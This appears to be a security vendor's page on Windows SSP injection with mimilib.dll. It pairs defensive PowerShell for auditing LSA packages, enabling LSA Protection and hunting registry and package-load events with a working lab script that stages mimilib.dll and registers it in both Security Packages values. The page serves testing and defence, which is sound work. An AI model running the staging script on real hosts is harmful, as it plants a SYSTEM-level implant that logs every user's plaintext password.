Is my host protected against SSP abuse?

This chain stages a mimilib.dll file and registers it as a Windows Security Support Provider (SSP), so that the Local Security Authority loads the custom DLL at boot.


SSPs (Security Support Providers) are dynamic link libraries (DLLs) that are loaded by the Local Security Authority (LSA) process in Windows operating systems at system startup. SSPs provide security-related services to Windows and are used to implement various authentication protocols, such as NTLM and Kerberos, which are used to validate user credentials and secure network communications. SSPs also have access to encrypted and plaintext passwords stored in Windows, such as domain passwords or smart card PINs, making them a prime target for attackers looking to steal sensitive information.

To register an SSP, an adversary edits the REG_MULTI_SZ values HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. Each entry is a bare package name that LSA resolves to a DLL of the same name in %SystemRoot%\System32, so staging mimilib.dll there and appending "mimilib" to either value is enough for the DLL to be loaded at the next boot, or immediately if the AddSecurityPackage Windows API function is called with that package name.

Once loaded into the LSA process, mimilib.dll runs as SYSTEM inside lsass.exe and sees every authentication that LSA handles. In its SSP role it writes the username, domain and plaintext password of each logon it observes to a log file on disk (kiwissp.log in System32), and because it is arbitrary code inside LSASS it can equally dump the credentials LSA holds in memory or do anything else the SYSTEM account can. The result is a persistent, highest-privilege foothold and a credential leak for every account that logs on to the host.
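The check a practitioner wants from the two paragraphs above is "what will LSA load on this host, and would it refuse an unsigned package?". The PowerShell below is an added example, not code from Prelude's chain: it reads both Security Packages values, resolves each name to its DLL in System32, checks the Authenticode signature, and reports the RunAsPPL (LSA Protection) state. The baseline list of stock package names is an assumption to adjust for your builds.

```powershell
# Added example (not part of the Prelude chain): enumerate the security packages
# LSA will load on this host and flag anything that is not a stock Windows
# package or is not Microsoft-signed. Run from an elevated PowerShell session.

function Get-LsaProtectionState {
    # RunAsPPL of 1 or 2 means LSASS runs as a Protected Process Light and
    # refuses to load security packages that are not Microsoft-signed
    # (an unsigned mimilib.dll is rejected at load time).
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RunAsPPL  = $lsa.RunAsPPL
        Protected = ($lsa.RunAsPPL -in @(1, 2))
    }
}

function Test-SspRegistration {
    param(
        # Stock package names on Windows 10/11 and Server 2016+. ASSUMPTION:
        # trim or extend this list for the builds in your estate.
        [string[]]$Baseline = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')
    )
    $keys = @(
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
    )
    foreach ($key in $keys) {
        # REG_MULTI_SZ comes back as string[]; the Lsa key often holds a literal
        # "" placeholder, which is not a package name and is skipped here.
        $packages = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($pkg in @($packages)) {
            $name = "$pkg".Trim()
            if ($name -eq '' -or $name -eq '""') { continue }
            # LSA resolves a bare package name to <name>.dll next to lsass.exe.
            $dll = Join-Path $env:SystemRoot "System32\$name.dll"
            $sig = if (Test-Path $dll) { Get-AuthenticodeSignature -FilePath $dll } else { $null }
            [pscustomobject]@{
                Key        = $key
                Package    = $name
                InBaseline = ($Baseline -contains $name)
                DllPresent = (Test-Path $dll)
                SigStatus  = if ($sig) { $sig.Status.ToString() } else { 'n/a' }
                Signer     = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            }
        }
    }
}

# Usage: an empty second table plus Protected = True is the answer the chain
# title asks for; any row it does print is a candidate implant.
Get-LsaProtectionState
Test-SspRegistration | Where-Object { -not $_.InBaseline -or $_.SigStatus -ne 'Valid' } | Format-Table -AutoSize
```

Running this after the chain has executed but before the reboot shows "mimilib" present in the registry with DllPresent = True and SigStatus other than Valid; on a host with RunAsPPL set, the package stays registered but LSASS will not load it.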

Testing

Execute "Is my host protected against SSP abuse?" in Operator on each host in your environment to test whether it is vulnerable.


Remediation

Defending against SSP injection is harder than it looks: the attack is a single registry value write followed by a reboot, and the payload then runs inside LSASS as SYSTEM. The most effective control is LSA Protection (RunAsPPL, available since Windows 8.1 and Server 2012 R2): when LSASS runs as a Protected Process Light it refuses to load any security package that is not Microsoft-signed, so an unsigned mimilib.dll never gets loaded. Back that up with detection. Monitor HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages for writes, either with Sysmon Event ID 13 (RegistryEvent, SetValue) and a rule covering those paths, or with Security Event ID 4657 once a SACL on the Lsa key and the "Audit Registry" subcategory are enabled. Also watch Security Event ID 4622 ("A security package has been loaded by the Local Security Authority") for package names outside your baseline, since that event fires only when LSA has actually loaded the DLL. A PowerShell query over those events, or a scheduled comparison of the two values against a known-good list, is enough to alert on the change.
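The hardening and the hunt described above, as an added PowerShell example that is not part of Prelude's page. It enables LSA Protection, parses Sysmon Event ID 13 and Security Event ID 4657 records for writes to the Security Packages values, and lists packages reported by Security Event ID 4622. It assumes Sysmon is installed with a RegistryEvent rule covering the Lsa key; the sample event embedded at the end is constructed to exercise the parser offline, not a real capture.

```powershell
# Added example (not part of the Prelude page): enable LSA Protection and hunt
# for SSP registration changes in the Sysmon and Security event logs.

# Matches both the HKLM\...\Lsa form Sysmon records and the
# \REGISTRY\MACHINE\...\ControlSet001\... form the Security log records.
$SspKeyPattern = '\\Control\\Lsa(\\OSConfig)?\\Security Packages$'

function Enable-LsaProtection {
    # Takes effect at the next reboot; from then on LSASS refuses unsigned
    # security packages. Requires an elevated session.
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'RunAsPPL' -Value 1 -Type DWord
}

function ConvertFrom-SspEvent {
    # Takes the XML of one event (Sysmon 13 or Security 4657) and returns a
    # record if it touches a Security Packages value, otherwise $null.
    param([Parameter(Mandatory)][string]$EventXml)
    [xml]$x = $EventXml
    $data = @{}
    foreach ($d in @($x.Event.EventData.Data)) { $data[[string]$d.Name] = [string]$d.'#text' }
    if ($data.ContainsKey('TargetObject')) {
        $target = $data['TargetObject']                                   # Sysmon 13
    } elseif ($data.ContainsKey('ObjectName')) {
        $target = $data['ObjectName'] + '\' + $data['ObjectValueName']    # Security 4657
    } else {
        return $null
    }
    if ($target -notmatch $SspKeyPattern) { return $null }
    $eid = $x.Event.System.EventID
    if ($eid -is [System.Xml.XmlElement]) { $eid = $eid.'#text' }
    [pscustomobject]@{
        EventId = [int]$eid
        Time    = $x.Event.System.TimeCreated.SystemTime
        Target  = $target
        Image   = if ($data.ContainsKey('Image')) { $data['Image'] } else { $data['ProcessName'] }
        User    = if ($data.ContainsKey('User')) { $data['User'] } else { $data['SubjectDomainName'] + '\' + $data['SubjectUserName'] }
        Details = if ($data.ContainsKey('Details')) { $data['Details'] } else { $data['NewValue'] }
    }
}

function Find-SspChanges {
    param([int]$Days = 30)
    $since = (Get-Date).AddDays(-$Days)
    $queries = @(
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13; StartTime = $since },
        @{ LogName = 'Security'; Id = 4657; StartTime = $since }   # needs a SACL and 'Audit Registry'
    )
    foreach ($q in $queries) {
        Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue |
            ForEach-Object { ConvertFrom-SspEvent -EventXml $_.ToXml() } |
            Where-Object { $_ }
    }
    # 4622 fires when LSA actually loads a package; a name outside your
    # baseline here means the implant is already running inside LSASS.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4622; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            [xml]$e = $_.ToXml()
            $pkg = (@($e.Event.EventData.Data) | Where-Object { $_.Name -eq 'SecurityPackageName' }).'#text'
            [pscustomobject]@{ EventId = 4622; Time = $_.TimeCreated; Target = 'LSA loaded package'; Image = 'lsass.exe'; User = $null; Details = $pkg }
        }
}

# Constructed sample (not a real capture) of the Sysmon Event ID 13 record that
# the chain's "add mimilib to reg" step would produce if written with reg.exe.
$SampleSysmonEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" />
    <EventID>13</EventID>
    <TimeCreated SystemTime="2023-01-01T00:00:00.000000000Z" />
  </System>
  <EventData>
    <Data Name="EventType">SetValue</Data>
    <Data Name="Image">C:\Windows\System32\reg.exe</Data>
    <Data Name="TargetObject">HKLM\System\CurrentControlSet\Control\Lsa\Security Packages</Data>
    <Data Name="Details">mimilib</Data>
    <Data Name="User">LAB\admin</Data>
  </EventData>
</Event>
'@

ConvertFrom-SspEvent -EventXml $SampleSysmonEvent   # parses offline and returns one record
Find-SspChanges -Days 30                            # live hunt on the host
```

The parser is deliberately fed event XML rather than a Get-WinEvent object so it can be pointed at exported .evtx-to-XML files or at forwarded events in a SIEM; the Details field of a Sysmon multi-string write is rendered differently across Sysmon versions, so alerting keys on the target path and the writing image, not on the value text.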

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!
There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.preludesecurity.com/products/operator
Try out Prelude Build: https://platform.preludesecurity.com/build
Try out Prelude Detect: https://www.preludesecurity.com/products/detect
See the latest kill chain and TTP Releases: https://chains.prelude.org
See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu
Reddit: https://www.reddit.com/r/preludeorg/
Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://www.preludesecurity.com/blog
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: https://twitter.com/privateducky
Alex: https://twitter.com/khyberspache
Octavia: https://twitter.com/VVX7
Waseem: https://twitter.com/gerbsec
Robin: https://twitter.com/bfuzzy1

Source: https://feed.prelude.org

Execute this chain

Download Operator (1.7.1)
Learn about Operator

TTPs

Stage mimilib.dll
add mimilib to reg
Reboot the machine
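The three TTPs listed above, as an added lab reproduction in PowerShell; this is not Prelude's own chain code. It assumes an elevated session, a copy of mimilib.dll from mimikatz at the path in $Source (an assumption), and a disposable test host. The one detail worth seeing in code is that the new package must be appended to the existing REG_MULTI_SZ rather than replacing it: overwriting OSConfig\Security Packages with a single name drops kerberos and msv1_0 and breaks logon after the reboot.

```powershell
# Added example (not part of the Prelude chain): the chain's three TTPs on a lab host.
# ASSUMPTION: $Source is where the staged DLL sits; adjust for your lab.
$Source = 'C:\lab\mimilib.dll'
$Target = Join-Path $env:SystemRoot 'System32\mimilib.dll'
$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Add-SecurityPackageEntry {
    param([Parameter(Mandatory)][string]$Key, [Parameter(Mandatory)][string]$Package)
    # Read the current list, drop the "" placeholder, append, and write back as
    # REG_MULTI_SZ so the stock packages survive.
    $current = @((Get-ItemProperty -Path $Key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages') |
        Where-Object { $_ -ne '' -and $_ -ne '""' }
    if ($current -contains $Package) { return [string[]]$current }
    $new = [string[]]($current + @($Package))
    Set-ItemProperty -Path $Key -Name 'Security Packages' -Value $new -Type MultiString
    return $new
}

function Remove-SecurityPackageEntry {
    param([Parameter(Mandatory)][string]$Key, [Parameter(Mandatory)][string]$Package)
    # Rollback: remove only our entry and leave the rest of the list intact.
    $remaining = @((Get-ItemProperty -Path $Key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages') |
        Where-Object { $_ -ne $Package }
    if (-not $remaining) { $remaining = @('""') }
    Set-ItemProperty -Path $Key -Name 'Security Packages' -Value ([string[]]$remaining) -Type MultiString
}

# 1. Stage mimilib.dll where LSA resolves bare package names.
Copy-Item -Path $Source -Destination $Target -Force

# 2. Add mimilib to both registry values the page names.
Add-SecurityPackageEntry -Key $LsaKey -Package 'mimilib'
Add-SecurityPackageEntry -Key "$LsaKey\OSConfig" -Package 'mimilib'

# 3. Reboot the machine so LSA loads the package at startup (destructive; left
#    commented so the script can be reviewed before it is run).
# Restart-Computer -Force

# Cleanup after the test:
# Remove-SecurityPackageEntry -Key $LsaKey -Package 'mimilib'
# Remove-SecurityPackageEntry -Key "$LsaKey\OSConfig" -Package 'mimilib'
# Remove-Item -Path $Target -Force   # then reboot once more to unload it
```

Note that on a host with RunAsPPL enabled the registry write and the reboot both succeed but LSASS refuses the unsigned DLL, which is exactly the condition the chain title is asking about.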

Tags

destructive